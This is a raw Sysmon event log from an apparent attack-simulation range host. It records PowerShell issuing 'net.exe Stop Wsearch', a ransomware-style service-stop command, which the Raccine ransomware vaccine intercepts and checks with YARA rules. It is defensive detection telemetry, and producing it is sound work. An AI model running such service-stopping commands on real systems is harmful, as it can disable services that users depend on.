Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002257768Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.036{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-5874-61B2-A109-010000000E02}5368C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002257767Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.036{9DBE88B5-5873-61B2-9C09-010000000E02}7008004C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5874-61B2-A109-010000000E02}5368C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002257766Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.036{9DBE88B5-5874-61B2-A109-010000000E02}5368C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\gen_powershell_invocation.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac3257.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Stop Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5873-61B2-9C09-010000000E02}700C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Stop Wsearch 10341000x80000000000000002257763Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.018{9DBE88B5-5874-61B2-A009-010000000E02}70288144C:\Windows\system32\conhost.exe{9DBE88B5-5874-61B2-9F09-010000000E02}2040C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002257757Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.005{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-5874-61B2-9F09-010000000E02}2040C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002257756Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.005{9DBE88B5-5873-61B2-9C09-010000000E02}7008004C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5874-61B2-9F09-010000000E02}2040C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002257755Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.005{9DBE88B5-5874-61B2-9F09-010000000E02}2040C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\ext-vars-test.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac3257.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Stop Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5873-61B2-9C09-010000000E02}700C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Stop Wsearch 10341000x80000000000000002257753Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:44.001{9DBE88B5-5873-61B2-9E09-010000000E02}70004340C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-5873-61B2-9C09-010000000E02}700C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002257736Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:43.993{9DBE88B5-5873-61B2-9E09-010000000E02}70004340C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002257669Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:43.950{9DBE88B5-C32E-61A8-0C00-000000000E02}8486480C:\Windows\system32\svchost.exe{9DBE88B5-5873-61B2-9C09-010000000E02}700C:\Program Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002257667Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:43.945{9DBE88B5-5873-61B2-9E09-010000000E02}70004340C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-5873-61B2-9C09-010000000E02}700C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002257650Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:43.936{9DBE88B5-5873-61B2-9E09-010000000E02}70004340C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002257584Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:43.896{9DBE88B5-C32E-61A8-0C00-000000000E02}8486480C:\Windows\system32\svchost.exe{9DBE88B5-5873-61B2-9C09-010000000E02}700C:\Program Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002257583Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:43.896{9DBE88B5-5873-61B2-9C09-010000000E02}7008004C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\Raccine.exe+c914|C:\Program Files\Raccine\Raccine.exe+5894|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002257581Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:43.890{9DBE88B5-5873-61B2-9E09-010000000E02}70004340C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-5873-61B2-9C09-010000000E02}700C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002257564Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:43.882{9DBE88B5-5873-61B2-9E09-010000000E02}70004340C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002257489Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:43.775{9DBE88B5-C32E-61A8-0C00-000000000E02}8486480C:\Windows\system32\svchost.exe{9DBE88B5-5873-61B2-9C09-010000000E02}700C:\Program Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002257488Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:43.773{9DBE88B5-5873-61B2-9C09-010000000E02}7008004C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5873-61B2-9D09-010000000E02}4288C:\Windows\system32\net.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\Raccine.exe+c914|C:\Program Files\Raccine\Raccine.exe+57ef|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x80000000000000002257487Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:43.771{9DBE88B5-5873-61B2-9C09-010000000E02}700ATTACKRANGE\AdministratorC:\Program Files\Raccine\Raccine.exeC:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac3257.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002257484Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:43.764{9DBE88B5-5873-61B2-9C09-010000000E02}7008004C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5873-61B2-9D09-010000000E02}4288C:\Windows\system32\net.exe0x1c3aC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+c6f00|C:\Windows\System32\KERNELBASE.dll+c6e21|C:\Program Files\Raccine\Raccine.exe+1876|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002257480Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:43.763{9DBE88B5-5873-61B2-9C09-010000000E02}7008004C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5873-61B2-9D09-010000000E02}4288C:\Windows\system32\net.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+1848|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002257479Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:43.763{9DBE88B5-5873-61B2-9D09-010000000E02}4288C:\Windows\System32\net.exe10.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Net CommandMicrosoft® Windows® Operating SystemMicrosoft Corporationnet.exe"C:\Windows\system32\net.exe" Stop WsearchC:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=C6B6DAA95CEA707F8D986D933E4A9596,SHA256=FDDC5F29F779A6EF73D70A2C551397FDEE63F549F2BCE4FE6A7AEEDC11F4F72E,IMPHASH=C41B15F592DE4589047CE5119CE87468{9DBE88B5-5873-61B2-9C09-010000000E02}700C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Stop Wsearch 10341000x80000000000000002257478Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:43.755{9DBE88B5-3AAE-61AE-0EA8-000000000E02}68046848C:\Windows\system32\conhost.exe{9DBE88B5-5873-61B2-9C09-010000000E02}700C:\Program Files\Raccine\Raccine.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002257473Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:43.753{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-5873-61B2-9C09-010000000E02}700C:\Program Files\Raccine\Raccine.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002257472Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:43.752{9DBE88B5-3AAE-61AE-0DA8-000000000E02}67766968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{9DBE88B5-5873-61B2-9C09-010000000E02}700C:\Program Files\Raccine\Raccine.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+ca360024(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e347d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e30b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+ca2ab3e6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97a002a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c9803a9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e5aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e5aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e593c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97d665c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e3b9e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e3710(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e347d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e30b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+ca2ab3e6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97c8363(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97c78d5(wow64) 154100x80000000000000002257471Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:43.752{9DBE88B5-5873-61B2-9C09-010000000E02}700C:\Program Files\Raccine\Raccine.exe1.4.2.0 BETAA Simple Ransomware Vaccine - see https://github.com/Neo23x0/RaccineRaccineRaccineRaccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Stop WsearchC:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=287F6CFBFFD83B75A0F8F749B0F636F3,SHA256=E5364CE4BD1814E003215BFF10DD2F191C33199260DFD2688D4F6CCE4A7C75B8,IMPHASH=B9673CBFF2550CFBFA1668EF53412C24{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x80000000000000002256442Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 